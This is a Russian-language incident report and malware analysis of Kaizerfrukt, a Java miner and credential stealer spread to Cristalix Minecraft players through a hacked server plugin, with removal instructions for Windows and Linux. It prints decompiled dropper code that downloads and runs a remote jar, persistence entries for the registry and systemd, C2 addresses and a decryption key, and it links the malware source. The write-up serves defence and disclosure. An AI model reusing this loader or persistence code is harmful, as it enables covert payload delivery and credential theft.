Kaizerfrukt Java Miner - The Cristalix Miner Incident

История о майнере-стиллере-ратнике Kaizerfrukt.

Автор статьи: @DenisMasterHerobrine

UPD от 20.01.2025. Исправлены некоторые грамматические ошибки и ссылка на плагин-зомби.

UPD от 20.02.2025. Были найдены и обнаружены третья и четвёртая итерация зловреда. Лечение примерно похожее, однако теперь лечение НЕ ГАРАНТИРУЕТ, что зловред будет именно в папке Common. Теперь сама папка состоит из двух рандомных слов из указанного в коде списка. Смотрите, если папка содержит 2 заглавные буквы и название какое-то странное и совершенно недавно обновлялась - возможно это та папка со зловредом. Содержимое не изменялось. Там точно лежит ярлык и .jar файлы. Лаунчер лечит это заражение с 25.01.2025, достаточно просто зайти на Миниигры.

Пролог

Однажды, сидел я спокойно себе, занимался своими делами... и ко мне внезапно обратился один человек с довольно странным вопросом.

"Привет, а не знаешь, Cristalix вообще как, нормально живёт, не взламывали его?"

Просто после игры на кристалликсе у меня и всех друзей появился майнер, который ещё и токены кристаликса пиздит

• Flowseal, 12.01, 12:22 МСК.

Я внезапно удивляюсь и отвечаю, что не слежу особо за Кристаликсом, хотя раньше там частенько играл в своё время. Может он подхватил откуда-то ещё с друзьями. После этого я получаю две интересные ссылки на client.jar и Main.class файлы, которые в свою очередь и будут фигурировать дальше в нашем разговоре.

Я решил проверить. Flowseal присылает мне, что хэш-суммы на момент скачки лаунчера и заражённого лаунчера в момент игры были одинаковы. Пошли проверять. Я скачал лаунчер с оф. сайта cristalix.gg и запустил экзешник.

Ничего подозрительного не обнаружилось, я подумал, что может он подхватил ещё чего, но после запуска клиента сервера Minigames началась очень подозрительная и аномальная нагрузка на процессор и видеокарту. К слову, для майна без шейдеров - это очень подозрительно, учитывая, что мой компьютер начинает пыхтеть и гудеть как не в себя, только когда я играю в какой-нибудь VR или какие-то очень требовательные игры. Даже кубы с шейдерами не особо нагружают. Но не об этом речь. Flowseal сообщил мне о папке Common, которая была задействована под майнер. И внезапно, я нахожу эту папку...

И тут началось...

Откуда это взялось? История появления Kaizerfrukt

На момент 13.01.2025, 15:05 по МСК известно следующее:

• [Обновлено 14.01] Само заражение начиналось при входе на сервера ивентов и некоторых серверов Аркады. Моды не были задеты, как и другая часть серверов. Заразились только те, кто когда-либо играл на ивентах или аркадах. По расчетам автора статьи это примерно 30-50% игроков. Возможно чуть больше или меньше. Если игрок ни разу на них не заходил, то шанс того, что у него был вирус крайне мал.
• Первый рабочий сэмпл майнера, который имеется на текущий момент датируется 31 января 2024 года и имеет ту же логику заражения, но немного иной, хоть и устаревший, функционал. Разработчики сервера подтвердили, что история действительно происходила с начала февраля 2024 года.

• Исходя из множества открытых данных было выявлено, что вредонос как правило присутствовал в разные даты и то добавлялся, то удалялся. Велика вероятность, что вредонос устанавливался волнами и потом пропадал.
• Сам по себе вредонос пошёл от одного из разработчиков минирежима. Разработчики сервера прокомментировали это так:

Одна из наших тачек была взломана и найдена уязвимость, и "хакер" патчил один из плагинов серверов, добавил отправку специального мода, который сложным образом обходил защиту клиента и устанавливал стиллер игроку, т. е. никто из админов не был в курсе и мы сами подверглись атаке стиллеров.

Мы начали проводить расследование и за часов 5 нашли все, нашли как отправлялся мод, как он обходил защиту в клиенте (у нас есть возможность загружать моды с сервера, НО, клиент очень, повторяю, очень сильно ограничивает моды, разработчик не может навредить компьютеру игрока, но конкретно в том случае, "хакер" нашел уязвимость, которая появилась после перехода на новые версии джавы, так сказать новые инструкции от джавы)

Мы сразу же исправили уязвимость в клиенте, и начали изучать вирус, что он делает и куда ставится. После фикса уязвимости, мы добавили автоматическое удаление вируса из системы, из автозапуска, процесс и саму директорию, и выкатили на прод. Поэтому игроку было достаточно перезайти в игру именно на миниигры, не сам лаунчер.

diamondden, Главный разработчик Cristalix.

• Вредонос был вычислен просто... автозагрузкой. Да. Вы правильно поняли. Он просто внаглую прописался даже не куда-то глубоко. Даже не как сервис. А на видное место. Было ли это специально или просто по приколу? Ответа, боюсь, не будет.

• По примерным подсчётам Kaizerfrukt потенциально заразил около 200 тысяч игроков за всё время своего существования. Возможно меньше, возможно больше. Но масштаб катастрофический. Прямо сильно катастрофический. Реальных цифр мы не знаем, поскольку на аркадах и ивентах играли довольно большое количество игроков в разное время.
• Фикс для Kaizerfrukt был реализован уже 12.01 в ~20:15 по МСК, лаунчер при перезаходе удалял всю папку Common. Сейчас же после запуска клиента полностью удаляется и папка Common, и ключ в реестре.
• На момент написания заметки 13.01 на протяжении дня лаунчер не работал вообще.

• "Хакер" начал подключаться и удалять всё под чистую на проекте, несколько ТБ данных было удалено и утеряно, что-то уже удалось восстановить, а что-то нет.
• Было также обнаружено несколько версий зловреда. Все версии разные. Однако, мною было решено разбить эти версии на 2 группы - v1 и v2. Версия v1 датируется от 31 января 2024 года до марта 2024 года, v2 датируется от 3 ноября 2024 года до 12 января 2025 года. Также была информация о весенних и летних сэмплах, но подтверждения пока нет.
• Известные сэмплы в полном объёме с исходниками и путями заражения и содержимым удалённых серверов датируются 31.01.2024, 01.02.2024, 29.11.2024, 31.11.2024, 01.01.2025, 03.01.2025, 05.01.2025 (несколько штук, отличается только clientId), 06.01.2024 (несколько штук, отличается только clientId), 08.01.2025 (несколько штук, отличается только clientId). 09.01.2025 (несколько штук, отличается только clientId), 11.01.2025 и 12.01.2025.
• Сам зловред вероятней всего заказной и писался одним человеком. Кто-то из разработчиков режимов миниигр явно был в этом заинтересован и периодически обновлял код зловреда.

• Ситуация с конкурсом, датируемым 3 февраля 2024 года очень хорошо ложилась как теория причастности конкурса к зловреду, однако разработчики опровергли и сказали, что не знали об этом ещё тогда и в действительности разыгрывали 1 миллион рублей. Тогда работала первая версия майнера Kaizerfrukt. Это подтверждают сэмплы от 31.01.24 и 01.02.24.

Это не правда, мы разыгрывали 1кк рублей, не подозревая, что у нас сидит этот паразит.

diamondden, Главный разработчик Cristalix.

• Что касаемо данных, то зловред не имел доступ к 90% оборудования проекта и по большей части задел только пользователей миниигр и администраторов. Подтверждения или опровержения, что майнер работал или не работал нет, однако, исходя из некоторых источников, велика вероятность, что первая версия зловреда именно майнила (но не исключён сам факт, что и стиллер был), а вторая по большей части работала как стиллер.

Принцип заражения серверов Cristalix

Как оказалось, произошло заражение не со стороны администрации и уж тем более владельца. Весь администраторский состав и сам владелец были подвержены заражению стиллера и часть из них были взломаны.

Были произведены взломы нескольких админов, были использованы удалённые доступы и не только для того, чтобы получить выгоду, потроллить или ещё чего устроить.

Я уже сказал ранее, что мы тоже стали его жертвами, он украл наши приватные ключи и имел удаленный доступ какое-то время.

Зная адреса некоторых наших тачек, он начал подключаться и удалять все подчистую, несколько ТБ данных было удалено и утеряно, что-то удалось восстановить, а что-то нет.

Поэтому рано утром кристаликс в моменте встал и перестал работать, именно потому что эта обиженка решила отомстить за то, что мы сломали его вирус.

Закидывать наши игрокам стиллеры или майнеры - просто не в наших интересах, мы таким НИКОГДА не занимались, никогда заниматься и не будем, мы ценим наших игроков, поэтому и боремся с подобными случаями.

diamondden, Главный разработчик Cristalix.

После чего, мне был предоставлен класс, который инициировал само заражение сервера. Распространиться он не успел.

Этап 0: Kaizerfrukt Injector (Stage -1)

Данный класс находился в одном из специально созданных плагинов одного из разработчиков. Сам класс не поддавался лёгкой деобфускации и требовалось через байткод вытащить класс в виде base64 строки.

https://i.imgur.com/xY98bZy.png

После извлечения base64 строки и возвращения байткода мы получаем следующий код:

private static final String url = "http://kaizer[.]solutions/v1";
private static final String lnk_file_b64 = "TAAAAAEUAgAAAAAAwAAAAAAAAEaxAQgAIAAAAAATLHef19oBgLC53v8Y2wEAEyx3n9faASDCAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA==";
private static final String computer_b64 = "FAAfUOBP0CDqOmkQotgIACswMJ0=";

Зловред имел ссылку на ярлык в виде base64 строки, куда была уже зашита сама команда на AppData\Local\Common и запуск изначального класса.

После чего идёт огромнейший блок кода, который внедряет и составляет класс Main.class, который и будет заражать систему и в дальнейшем обновлять вредонос.

Замечание: Тут должен был быть разбор кода, но у Telegraph ограничения по символам. Исходник кода придётся смотреть вам здесь. Примерный разбор ниже.

Суть заключалась в том, что файл генерировал заранее заготовленную полезную нагрузку, но только лишь при определённых условиях.

• Например, если в пути на Windows в папке Program Files была папка или файл, оканчивающийся на 360, то система не заражалась. Смею предположить, что это связано с тем, что уже тогда 360 Total Security мог детектировать зловреда и это бы легко спалилось?
• Также, можно заметить, что если на заражённой машине или сервере стояла переменная среды ZV_ZV с какими-либо значениями - заражения не происходило. Вероятно, это было сделано из-за того, чтобы автор случайно не заразился зловредом во время разработки или тестирования.
• Если не присутствовала Java - то ищется самая актуальная или хоть вообще какая-либо в системе через цикл for.
• Далее генерируется список необходимых библиотек с домена kaizer[.]solutions/v1/list и файлов зловреда. Класс их расшифровывал и генерировал полезную нагрузку в память заражённого сервера и отсылал клиентам.
• Если заражение происходило не на Windows, то запускался Main.

Runtime.getRuntime().exec(new String[]{"java", "Main"}, (String[])null, dir.toFile());

Честно говоря, на данный момент, не особо понятно, что делала конкретно это строка в рамках цикла while (true). Будет обновлено позже.

• Также, благодаря этому классу-зомби, стало известно, каков функционал у Linux.

Если кратко, то зловред прописывал себя в pulseaudio и в pipewire сервисы, оставлял ключ на автозапуск в override.conf и отправлял на исполнение в дальнейшем и выполнял те же функции, что и на Windows, а именно запускал Main.class, который и запускал уже client.jar.

Принцип заражения Kaizerfrukt v2

После того, как лаунчер был запущен - ничего не происходит аномального. Как только пользователь лаунчера логинится и запускает клиент Minigames и заходит на сервер ивентов или аркад - начинается магия.

Заражение идёт в несколько этапов.

Этап 1: Kaizerfrukt Dropper (Stage 0)

• После того, как взлом и компрометация заражённого сервера произошло успешно, при заходе на заражённый сервер с минииграми запускался Stage 0.
• После захода порождается процесс java.exe , который в свою очередь обращается к директории %username%\AppData\Local\Common и после этого создаёт несколько .jar файлов и скачивает с сайта kaizer[.]solutions их содержимое. Для Linux это директория home\.local\share\java8. Далее суть та же, как и у Windows.

• Помимо .jar файлов появляется ещё и скомпилированный Main.class, о котором упоминалось в прологе. Также можно заметить ярлык и файл clientId, которые впоследствии сыграют ключевую роль заражения.
• Прописывает себя в реестр через Stage 0 по пути HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\javaw.lnk на автостарт при запуске вашего ПК.

Этап 2: LNK Launcher, ярлык-лаунчер (Stage 1)

• После того, как сам зловред client.jar и его зависимости были установлены в систему, java.exe отправляет команду открытия файла javaw.lnk на исполнение как от имени javaw.exe. Важно учесть, что расширение у обоих файлов разное, а назначение уж тем более. Это происходит как раз в тот момент, когда игра раскрывается на полный экран и вы идёте на сервер играть.
• Сам по себе ярлык содержит заранее состряпанную автором зловреда строку с Java, которая предустанавливается по просьбе самого лаунчера или самим пользователем. В конкретном случае рассматриваемого заражения это была Java 17, которая поставлялась от вендора Microsoft одновременно с лаунчером.

Код ярлыка выглядел следующим образом:

"C:\Program Files\Microsoft\jdk-17.0.10.7-hotspot\bin\javaw.exe" -cp AppData\Local\Common Main

Разбираемся. Первая строка просто определяет файл Java JDK 17 и указывает его на запуск при запуске ярлыка. Может разниться от разных версий Kaizerfrukt-а.

Аргумент -cp отвечает за путь к классу на исполнение. В отличие от -jar, он запускает отдельный файл. По факту это превращает ярлык в исполняемый файл, а не просто ссылку на файл с классом, который бы открывался либо в текстовом редакторе, либо в другой программе. (в случае автора - в Intellij IDEA)

После чего идёт директория *AppData\Local\Common*. Причём без явного и полного пути. Это относительный путь относительно папки .cristalix. Соответственно процесс шёл уже от чего-то изнутри папки .cristalix.

Main - сам исполняемый класс вредоноса, который отправляет на исполнение уже докачиватель и расшифровщик вредоноса.

Этап 3: Main.class, Main$1.class, Main$1$1.class, он же Update.class, он же Loader.class, он же и Kaizerfrukt Loader (Stage 2)

Как только javaw.lnk отправляется на исполнение, создаётся новый уже процесс от Java Wrapper (javaw.exe) с исполнением самого загрузчика.

Загрузчик выполнял следующее в хронологическом порядке:

• Проверяет, какая система стоит у Пользователя - Windows или Linux.
• После чего шёл на домены kaizer[.]solutions/v1/list или big-tomato[.]org/v1/list в случае недоступности первого.
• После чего скачивал файл list.txt, который в свою очередь уже проверял наличие библиотек для запуска вредоноса и общался с зеркалами зловреда, такими как 121[.]40[.]151[.]149:8081, 47[.]92[.]101[.]84:8081 и другие. Полный список найти можно ниже.
• Ключ шифрования:
  7589b38cae92de2b21be0479fc1168745c0cadf1
• После синхронизации и обновления себя, отправляется на поиск класса kaizerfrukt.client.Main и расшифровывает нужные библиотеки и главный исполняемый файл client.jar.
• Файл был перемещён сюда из-за проблем с длиной поста.

Этап 4: client.jar, или же само тело Kaizerfrukt (Stage 3)

• Проверяет, соблюдены ли условия для майнинга (>4 ядер процессора, не забита ли оператива и так далее)
• Подключается к удалённому серверу с пулом kaizer[.]solutions:10000
• Отправляет пакет с данными об ОС, имя пользователя, системное имя пользователя (hostname), куки и пароли из файлов браузеров Opera, Edge, Yandex и другие, считывает все логины и токены, которые были когда-либо залогинены на устройстве в лаунчере Cristalix. Также крадёт Discord и Telegram токены и шлёт туда же к удалённому серверу для дальнейшей компрометации.
• Подключает вас к C2C-серверу kaizer[.]solutions для управления вашими файлами. На этом этапе возможна скачка и докачка файлов. (StreamManager)
• Проверяет путь от папки файлов для Cristalix.exe (Stage 0) в поисках старой версии малваря, датируемым 31 января 2024 года. О ней рассказано будет чуть позже, когда январско-февральская версия будет полностью изучена. Проверяется файл client-id , если была установлена старая версия малваря от 31.01.24 или clientId файл, если установлена новая версия малваря от 03.11.24 и таким образом присваивается собранная информация к ID из файла для дальнейшей компрометации из БД зловреда.
• После чего остаётся на постоянном подключении и запускает майнер, который добывает криптовалюту Monero с тем же пулом kaizer[.]solutions:10000.
• Время от времени отсылает пакет с паролями и данными при автостарте.
• Майнит Monero при 5 минутах бездействия ПК и до выключения ПК (даже если вы вернулись). Сворачивает деятельность при активном диспетчере задач. (?, требуется допроверка)

Исходники Kaizerfrukt v2

Все исходники перезалиты пользователем radioegor146. Посмотреть на малварь можно в публичном GitHub репозитории - https://github.com/radioegor146/kaizerfrukt

Лечение заражения Kaizerfrukt v2

• Заходим в C:\Users\<имя_пользователя>\AppData\Local или C:\Пользователи\<имя_пользователя>\AppData\Local - вместо <имя_пользователя> - имя вашего пользователя.
• Проверяем, есть ли папка Common. Если нет такой папки - скачиваем DrWeb CureIt на крайний случай и сканируем систему. Подозрительное или вирусное - удаляем.
• Если папка есть, удаляем папку Common. Если папка Common не удаляется и пишется ошибка, что папка занята другим процессом - идём в Диспетчер задач и убиваем все процессы java.exe/javaw.exe. Если вы параллельно играли в Minecraft - придётся закрыть игру тоже.
• Нажмите Win + R  
• Введите regedit
• Вверху, в пути вставьте это: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• Ищите строку javaw, у которого в пути указан путь в папку Common и удалите его.
• Закройте реестр.
• Скачиваем DrWeb CureIt на крайний случай и сканируем систему. Подозрительное или вирусное - удаляем.
• Делаем ребут.
• Меняем все пароли на всех важных аккаунтах, в том числе и проверяем пользователей лишних в ТГ/Discord/где есть двухфакторка.
• Ничего не нашли и всё поменяли? Вы молодцы и в порядке. Вам больше ничего не грозит. Можете взять печеньку. :cookie: 
• Начиная с 14.01 лаунчер удаляет заражение автоматически при запуске клиента миниигр. В случае, если вы что-то забыли снести или не нашли эту папку - лаунчер сам попробует всё исправить.

Если вы пользователь Linux:

• Удалите упоминания и строки, содержащие строку java8update и Main в файлах override.conf у сервисов: pulseaudio и pipewire. Это автостарт зловреда при каждом запуске системы. Также убедитесь, что в файлах нет строки на исполнение зловреда.
• Зловредный конфиг сервисов выглядит так:

[Service]
MemoryDenyWriteExecute=no
NoNewPrivileges=no
ExecStartPost=setsid -f env -C <директория .local\share\java8> java Main

• Если увидели - удаляем.
• Если папка .local\share\java8 есть, удаляем её.
• Перезагружаем систему.
• Меняем все пароли на всех важных аккаунтах, в том числе и проверяем пользователей лишних в ТГ/Discord/где есть двухфакторка.
• Ничего не нашли больше и всё поменяли? Вы молодцы и в порядке. Вам больше ничего не грозит. Можете взять печеньку. :cookie: 

Принцип заражения Kaizerfrukt v1 (январско-февральская версия)

• Здесь начинается история самого Kaizerfrukt. Проблема заключается в том, что данный зловред на руках в полном объёме и стейджами не присутствует на данный момент времени, а значит далеко не всё получится задокументировать. Первые признаки и подобные разговоры датируются 2019 годом.

Этап 1: Kaizerfrukt Dropper (Stage 0)

• После того, как взлом и компрометация заражённого сервера произошло успешно, при заходе на заражённый сервер с минииграми запускался Stage 0.
• После захода порождается процесс java.exe , который в свою очередь обращается к директории %username%\AppData\Local\Common и после этого создаёт .jar файл с названием app.jar и скачивает с IP адреса 91[.]108[.]241[.]89 его содержимое. Linux вариация существовала, но на тот момент как такового функционала особо не имела?

• Помимо .jar файла появляется ещё и скомпилированный Main.class, о котором упоминалось в прологе. В старой версии присутствовал лишь app.jar.
• Тело дроппера выглядит примерно так:

public class Main {
   private static final String appUrl = "http://91[.]108[.]241[.]89:8080/app.jar";

   public static void main(String[] var0) {
      while(true) {
         try {
            Thread.sleep((long)(new Random()).nextInt(180000));
         } catch (InterruptedException var10) {
         }

         try {
            Map var1 = getResources("http://91[.]108[.]241[.]89:8080/app.jar");
            ClassLoader var2 = createAppClassLoader(var1);
            InputStream var3 = var2.getResourceAsStream("/META-INF/MANIFEST.MF");
            Manifest var4 = new Manifest(var3);
            Attributes var5 = var4.getMainAttributes();
            String var6 = (String)var5.get(Name.MAIN_CLASS);
            Class var7 = var2.loadClass(var6);
            Method var8 = var7.getMethod("main", String[].class);
            var8.invoke((Object)null, new String[0]);
         } catch (Throwable var9) {
            var9.printStackTrace();
         }
      }
   }

   private static ClassLoader createAppClassLoader(Map<String, byte[]> var0) throws IOException {
      URL var1 = new URL("memory", (String)null, -1, "/", new 1(var0));
      return new URLClassLoader(new URL[]{var1});
   }

   private static Map<String, byte[]> getResources(String var0) throws IOException {
      HashMap var1 = new HashMap();
      ZipInputStream var2 = new ZipInputStream((new URL(var0)).openStream());
      Throwable var3 = null;

      try {
         ZipEntry var4;
         try {
            while((var4 = var2.getNextEntry()) != null) {
               if (!var4.isDirectory()) {
                  ByteArrayOutputStream var5 = new ByteArrayOutputStream();
                  byte[] var6 = new byte[1024];

                  int var7;
                  while((var7 = var2.read(var6, 0, var6.length)) != -1) {
                     var5.write(var6, 0, var7);
                  }

                  byte[] var8 = var5.toByteArray();
                  var1.put("/" + var4.getName(), var8);
               }
            }
         } catch (Throwable var16) {
            var3 = var16;
            throw var16;
         }
      } finally {
         if (var2 != null) {
            if (var3 != null) {
               try {
                  var2.close();
               } catch (Throwable var15) {
                  var3.addSuppressed(var15);
               }
            } else {
               var2.close();
            }
         }

      }

      return var1;
   }
}

Этап 1: app.jar

• На момент написания статьи, информации о app.jar найти не удалось, ни сэмпла, ни каких-либо следов в виду давности. Единственное его упоминание датируется 27 января 2024 года, но есть только скриншоты сомнительного происхождения. Если вы обладаете таким файлом в папке Common и не заходили на Cristalix с февраля-месяца, пожалуйста, сообщите автору статьи. Спасибо.
• Из предполагаемой информации, это по сути всё тот же client.jar из v2 версии Kaizerfrukt, но всего-лишь создавал дополнительную нагрузку как майнер. Свойствами стиллера скорее всего не обладал, но подлинных данных этого не было найдено.
• Сам IP адрес с app.jar файлом был удалён и более недоступен. На этом IP адресе теперь находится GTA RP сервер. Связано ли это как-то со зловредом или просто случайность, мы не знаем. ¯\_(ツ)_/¯
• У февральской версии также была замечена промежуточная "мутация", ещё при старом расположении Java, которая содержит ярлык, который ведёт в Common с уже иной немного командой перед стартом app.jar, но принцип тот же.

Пример промежуточного ярлыка из первой версии, javaw.lnk:

"C:\Program Files (x86)\Common Files\Oracle\Java\javapath\javaw.exe" -cp "C:\Users\<юзер>\AppData\Local\Common" Main

Лечение Kaizerfrukt v1 (январско-февральская версия)

• Заходим в C:\Users\<имя_пользователя>\AppData\Local или C:\Пользователи\<имя_пользователя>\AppData\Local - вместо <имя_пользователя> - имя вашего пользователя.
• Проверяем, есть ли папка Common. Если нет такой папки - скачиваем DrWeb CureIt на крайний случай и сканируем систему. Подозрительное или вирусное - удаляем.
• Если нашли эту папку, то удаляем папку Common. Если папка Common не удаляется и пишется ошибка, что папка занята другим процессом - идём в Диспетчер задач и убиваем все процессы java.exe/javaw.exe. Если вы параллельно играли в Minecraft - придётся закрыть игру тоже.
• Нажмите Win + R  
• Введите regedit
• Вверху, в пути вставьте это: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• Ищите строку app, у которого в пути указан путь в папку Common и удалите его.
• Закройте реестр.
• Скачиваем DrWeb CureIt на крайний случай и сканируем систему. Подозрительное или вирусное - удаляем.
• Делаем перезапуск ПК.
• На всякий случай рекомендуется поменять все пароли и токены. Хоть и нет явных доказательств, что v1 обладал функциями стилера - лучше перебдеть.
• Ничего не нашли и всё поменяли? Вы молодцы и в порядке. Вам больше ничего не грозит. Можете взять печеньку. :cookie:
• Начиная с 14.01 лаунчер удаляет заражение автоматически при запуске клиента миниигр. В случае, если вы что-то забыли снести или не нашли эту папку - лаунчер сам попробует всё исправить.

Внутренности инфраструктуры Kaizerfrukt

Внутри сайта был ещё также найдены хорошо обфусцированные JS скрипты с бэкэндом и парсером данных, который принимал всё, что отсылал client.jar.

Первый скрипт был получен 13.01 в 18:11 по МСК.

Описание работы бэкэнда появится здесь позже. К сожалению, там мало чего хорошего. Начиная от использования украденных данных, заканчивая потенциальными попытками красть деньги с карт? Вопросов много. Много обфускации.

Благодарности:

@Flowseal - за первый детект.

@radioegor146 - за перезалив на GitHub.

Разработчикам Cristalix за детали внутреннего расследования.

Всем остальным за находки и замечания. Всем другим ребятам, кто скидывал сэмплы для расследования. Вас много, спасибо всем!